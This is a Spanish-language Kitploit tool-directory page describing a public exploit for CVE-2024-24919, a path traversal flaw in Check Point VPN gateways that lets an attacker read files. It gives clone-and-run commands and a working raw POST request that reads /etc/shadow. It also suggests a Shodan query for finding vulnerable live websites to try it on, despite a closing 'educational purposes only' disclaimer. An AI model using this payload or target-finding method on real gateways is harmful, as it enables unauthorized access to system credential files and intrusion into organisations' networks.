Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-24919-Exploit — CVE-2024-24919 Exploit and PoC - LFI Crítica para VPN de Acceso Remoto o Acceso Móvil | Kitploit
Herramientas/GitHubGitHub/rug4lo/cve-2024-24919-exploit
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónAprendizaje y Educación
GitHubrug4lo/cve-2024-24919-exploit

CVE-2024-24919-Exploit

CVE-2024-24919 Exploit and PoC - LFI Crítica para VPN de Acceso Remoto o Acceso Móvil

Ver Repositorio
3hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-24919-Exploit

Resumen

Este repositorio contiene un exploit en Python para el CVE-2024-24919, una vulnerabilidad que permite leer archivos sensibles de la página vulnerable.

Este exploit primero verifica si el objetivo es vulnerable, y luego obtiene la ruta que especifiques.

Severidad: Crítica

Uso

Primero clona el repositorio:

root@kitploit:~
git clone https://github.com/Rug4lo/CVE-2024-24919-Exploit
cd CVE-2024-24919-Exploit

Da permisos y ejecuta el exploit con python3

root@kitploit:~
chmod +x exploit.py
python3 exploit.py

Luego sigue los pasos y obtendrás los datos del archivo que especifiques

Si tienes problemas, asegúrate de que la URL que especifiques sea la principal

✓ https://google.com

✘ https://google.com/search?client=firefox

POC (Prueba de Concepto)

Primero debemos asegurarnos de que el sitio web tenga Check Point Security Gateways con acceso remoto VPN o software de acceso móvil habilitado.

En este exploit apuntamos al endpoint {ip}/clients/MyCRL.

Este endpoint es vulnerable si hacemos una petición POST, agregamos la cadena CSHELL/ y la ruta del archivo que queremos leer usando un Path Traversal.

La solicitud será algo como esto:

root@kitploit:~
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

Obtenemos todo esto mirando el código fuente

Para más información sobre el proceso, revisa este post --> https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/

Prueba

Si quieres probar esta vulnerabilidad puedes usar Sodan para encontrar algunos sitios web vulnerables, usando esta consulta en sodan

root@kitploit:~
Server: “Check Point SVN Foundation”

References

https://nvd.nist.gov/vuln/detail/CVE-2024-24919 https://www.cronup.com/cve-2024-24919-zeroday-critico-explotado-activamente-en-vpns-check-point/ https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-24919

Descargo de responsabilidad

Este script es solo con fines educativos. Úsalo de manera responsable y solo en sistemas para los que tengas permiso de acceso.

Descargar herramienta